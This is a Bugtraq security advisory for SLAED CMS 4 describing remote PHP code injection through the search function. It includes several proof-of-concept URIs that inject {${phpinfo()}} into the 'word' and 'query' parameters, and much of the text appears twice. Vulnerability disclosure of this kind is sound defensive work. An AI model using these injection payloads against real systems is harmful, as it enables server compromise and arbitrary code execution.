SLAED CMS Multiple Remote PHP Code Injection Vulnerabilities
BID:49568
Info
SLAED CMS Multiple Remote PHP Code Injection Vulnerabilities
| Bugtraq ID: | 49568 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2011 12:00AM |
| Updated: | Sep 12 2011 12:00AM |
| Credit: | brain[pillow] |
| Vulnerable: |
SLAED CMS SLAED CMS 4 |
| Not Vulnerable: | |
Discussion
SLAED CMS Multiple Remote PHP Code Injection Vulnerabilities
SLAED CMS is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary PHP code because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
SLAED CMS is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary PHP code because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
Exploit / POC
SLAED CMS Multiple Remote PHP Code Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view
http://www.example.com/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view
http://www.example.com/search.html?mod=&word={${phpinfo()}}&query=ok&to=view
http://www.example.com/search.html?mod=&word=ok&query={${phpinfo()}}&to=view
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view
http://www.example.com/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view
http://www.example.com/search.html?mod=&word={${phpinfo()}}&query=ok&to=view
http://www.example.com/search.html?mod=&word=ok&query={${phpinfo()}}&to=view
Solution / Fix
SLAED CMS Multiple Remote PHP Code Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
SLAED CMS Multiple Remote PHP Code Injection Vulnerabilities
References:
References:
- Vendor Homepage (Openslaed)